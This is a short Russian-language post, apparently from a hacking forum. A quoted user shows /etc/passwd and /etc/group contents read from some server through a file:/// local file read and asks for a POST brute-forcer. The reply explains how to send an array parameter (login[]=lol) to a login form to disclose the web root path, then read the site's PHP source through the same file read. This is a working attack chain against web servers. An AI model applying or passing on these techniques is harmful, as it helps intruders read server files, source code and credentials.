
14.10.2016, 01:15
|
|
Познающий
Регистрация: 26.03.2011
Сообщений: 81
Провел на форуме: 24770
Репутация:
2
|
|
Сообщение от sinfo
↑
file:///etc/passwd да вот только что нашел,ток в другом месте
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
/etc/group
crontab:x:102:
Debian-exim:x:103:
mlocate:x:104:
ssh:x:105:
А есть брут??работающий с post запросами?
Значит смотри, если у тебя получилось прочитать локальный файл, ищи раскрытие путей например
пост в авторизации
site.com/login
post data
login[]=lol
дает нам /var/www/site.com/public_html/lol/db.php error 31 line
тогда мы имеем следующую возможность чтения
file:///var/www/site.com/public_html/index.php
|
|
|